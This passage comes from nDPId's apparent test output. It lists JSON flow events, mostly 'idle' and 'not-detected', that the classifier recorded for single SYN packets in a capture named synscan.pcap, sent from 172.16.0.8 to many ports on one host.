-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":810,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TargusDataspeed","breed":"Acceptable","category":"Network"}} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5002,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1993,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061416,"flow_last_seen":1278275061416,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1798,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061109,"flow_last_seen":1278275061109,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1644,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060903,"flow_last_seen":1278275060903,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9099,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1727,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061006,"flow_last_seen":1278275061006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9099,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5003,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1859,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5003,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060746,"flow_last_seen":1278275060746,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060642,"flow_last_seen":1278275060642,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1600,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060850,"flow_last_seen":1278275060850,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5004,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1509,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060744,"flow_last_seen":1278275060744,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":630,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059515,"flow_last_seen":1278275059515,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9101,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":707,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059625,"flow_last_seen":1278275059625,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9101,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":138,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058096,"flow_last_seen":1278275058096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1780,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061107,"flow_last_seen":1278275061107,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1299,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060439,"flow_last_seen":1278275060439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9102,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":154,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058220,"flow_last_seen":1278275058220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9102,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":911,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":911,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9103,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1351,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":912,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":456,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":912,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060797,"flow_last_seen":1278275060797,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":912,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":492,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":912,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5009,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1611,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060899,"flow_last_seen":1278275060899,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5009,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19350,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
-00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1389,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060592,"flow_last_seen":1278275060592,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":19350,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":437,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059030,"flow_last_seen":1278275059030,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9110,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 